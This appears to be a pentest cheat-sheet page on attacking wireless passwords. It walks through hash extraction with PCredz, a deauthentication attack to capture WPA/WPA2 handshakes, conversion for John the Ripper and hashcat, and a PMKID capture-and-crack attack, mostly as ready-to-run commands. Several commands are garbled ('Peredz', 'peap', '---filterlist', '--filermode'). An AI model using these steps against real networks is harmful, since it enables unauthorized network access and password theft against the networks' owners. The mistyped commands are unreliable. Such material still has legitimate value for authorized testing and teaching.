PCAP - Wireless Passwords

## PCREDZ (PCAP HASH EXTRACTION) https://github.com/lgandx/PCredz Extracts network authentication hashes from pcaps. Extract hashes from a single pcap file: ``` Peredz -f example.peap ``` Extract hashes from multiple pcap files in a directory: ``` Peredz -d /path/to/peaps ``` Listen on an interface and extract hashes live crossing your interface: ``` Peredz -i eth0 ``` ## WPA/WPA2 PSK AUTHENTICATION To crack WPA/WPA2 wireless access points you need to capture the 4-way WPA/WPA2 authentication handshake. ### AIRMON-NG / AIRODUMP-NG / AIREPLAY-NG STEP 1: Create monitoring interface mon0 Ex) interface wlan0 ``` airmon-ng start wlan0 ``` STEP 2: Capture packets to file on target AP channel Ex) channel 11 ``` airodump-ng mon0 --write capture.cap -c 11 ``` STEP 3: Start deauth attack against BSSID Ex) bb:bb:bb:bb:bb:bb ``` aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0 ``` STEP 4: Wait for confirmation to appear at top of terminal: ``` CH 11 ][ Elapsed: 25 s ][<DATE / TIME>][ WPA handshake: ** ``` STEP 5: Extract handshake into JOHN or HASHCAT format: [[John The Ripper]] FORMAT EXTRACT ``` Stepl: cap2hccap.bin -e '<ESSID>' capture.cap capture_out.hccap Step2: hccap2john capture_out.hccap > jtr_capture ``` [[HashCat]] FORMAT EXTRACT cap2hccapx.bin capture.cap capture_out.hccapx ### WPA2 PMKID WIRELESS ATTACK To avoid having to capture the 4-way handshake a new attack was discovered, which allows an attacker to connect to a target WPA2 WiFi Access Point and retrieve the PMKID. STEP 1: Install HCXTOOLS and use a wireless card capable of monitor mode: ``` git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool make make install cd git clone https://github.com/ZerBea/hcxtools.git cd hcxtools make make install ``` STEP 2: Start your wireless card to listen for broadcasting access points and locate the BSSID you want to target: ``` airodump-ng <interface> ``` STEP 3: Place your target BSSID (A0BB3A6F93) into a file 'bssid_target.txt' and start 'hcxdumptool' to capture the PMKID: ``` hcxdumptool -i <interface> ---filterlist=bssid_target.txt --filermode=2 --enable_status=2 -o pmkid.pcap ``` STEP 4: With the target BSSID PMKID capture we need to extract it into hashcat format for cracking: ``` hcxpcaptool -z wpa2_pmkid_hash.txt pmkid.pcap STEP 5: Start cracking with hashcat: hashcat -a 0 -m 16800 -w 4 wpa2_pmkid_hash.txt dict.txt ``` ### WIFITE ATTACK MISC WLAN TOOLS [[HCXTOOLS]]: capture and convert packets from wlan devices for use with Hashcat. https://github.com/ZerBea/hcxtools [[Home]]